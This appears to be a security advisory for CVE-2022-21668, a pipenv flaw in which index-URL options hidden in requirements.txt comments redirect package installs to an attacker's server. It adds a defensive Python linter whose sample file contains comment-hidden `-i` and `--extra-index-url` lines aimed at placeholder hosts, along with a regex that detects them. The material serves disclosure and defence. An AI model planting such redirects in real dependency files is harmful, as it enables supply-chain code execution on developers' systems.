CVE-2022-21668: Pipenv's requirements.txt parsing allows malicious index url in comments
Due to a flaw in pipenv's parsing of requirements files, an attacker can insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file (e.g. with "pipenv install -r requirements.txt") to download dependencies from a package index server controlled by the attacker. By embedding malicious code in packages served from their malicious index server, the attacker can trigger arbitrary remote code execution (RCE) on the victims' systems.
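A defender's check for the pattern described above, as an added example that is not part of this advisory or of pipenv's code: a small linter that flags pip index options found inside requirements.txt comments, and index options outside comments that point at hosts not on an allowlist. It assumes that the "specially crafted string" is a pip index option (`-i`, `--index-url` or `--extra-index-url`), which is how the linked GHSA advisory describes the issue; the sample file, the `.invalid` hostnames and the `TRUSTED_HOSTS` allowlist are constructed for the example.

```python
"""
Added example (not pipenv's own code): audit a requirements.txt for index-URL
options hidden in comments and for index hosts outside an allowlist.
Assumption: the crafted string is a pip index option (-i / --index-url /
--extra-index-url), as the linked GHSA advisory describes.
"""
import re
from urllib.parse import urlsplit

# pip treats '#' as the start of a comment only at the beginning of a line or
# after whitespace, so a '#sha256=...' fragment glued to a URL is not a comment.
COMMENT_RE = re.compile(r"(?:^|(?<=\s))#.*$")

# An index option followed by '=' or whitespace and then the URL.
INDEX_OPT_RE = re.compile(
    r"(?:^|\s)(?:-i|--index-url|--extra-index-url)(?:=|\s+)(\S+)"
)

# Constructed allowlist for the example; adjust to your own mirrors.
TRUSTED_HOSTS = {"pypi.org", "files.pythonhosted.org"}


def split_comment(line):
    """Return (code_part, comment_part) for one requirements.txt line."""
    m = COMMENT_RE.search(line)
    if m is None:
        return line, ""
    return line[: m.start()], m.group(0)


def audit_requirements(text, trusted_hosts=TRUSTED_HOSTS):
    """Return a list of (line_number, finding_kind, url) tuples.

    'index-url-in-comment'  : an index option appears inside a comment, which
                              a correct parser must ignore but vulnerable
                              pipenv releases honoured.
    'untrusted-index-host'  : a real (non-comment) index option points at a
                              host that is not in the allowlist.
    """
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        code, comment = split_comment(raw)
        for m in INDEX_OPT_RE.finditer(comment):
            findings.append((lineno, "index-url-in-comment", m.group(1)))
        for m in INDEX_OPT_RE.finditer(code):
            url = m.group(1)
            host = (urlsplit(url).hostname or "").lower()
            if host not in trusted_hosts:
                findings.append((lineno, "untrusted-index-host", url))
    return findings


# Constructed sample requirements file: lines 3 and 4 hide index options in
# comments, line 5 is a legitimate index option, line 6 has a URL fragment
# that must not be mistaken for a comment.
SAMPLE = """\
# project requirements (constructed sample)
requests==2.27.1
# harmless note -i https://pypi.example.invalid/simple   <- option hidden in a comment
flask==2.0.2 # pinned --extra-index-url=https://mirror.example.invalid/simple
--index-url https://pypi.org/simple
somepkg @ https://files.pythonhosted.org/packages/x.whl#sha256=deadbeef
"""

if __name__ == "__main__":
    for lineno, kind, url in audit_requirements(SAMPLE):
        print(f"line {lineno}: {kind}: {url}")
```

Run it over every requirements file in a repository as a pre-merge check; any `index-url-in-comment` finding is a reason to reject the file outright, since there is no legitimate reason for an index option to sit inside a comment, and `untrusted-index-host` findings should be reviewed against the mirrors your organization actually operates.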
References
- github.com/advisories/GHSA-qc9x-gjcv-465w
- github.com/pypa/advisory-database/tree/main/vulns/pipenv/PYSEC-2022-6.yaml
- github.com/pypa/pipenv
- github.com/pypa/pipenv/commit/439782a8ae36c4762c88e43d5f0d8e563371b46f
- github.com/pypa/pipenv/releases/tag/v2022.1.8
- github.com/pypa/pipenv/security/advisories/GHSA-qc9x-gjcv-465w
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/56HBA3EOSLEDNCCBJVHE6DO34P56EOUM
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KCROBYHUS6DKQPCXBRPCZ5CDBNQTYAWT
- lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QHQRIWKDP3SVJABAPEXBIQPKDI6UP7G4
- nvd.nist.gov/vuln/detail/CVE-2022-21668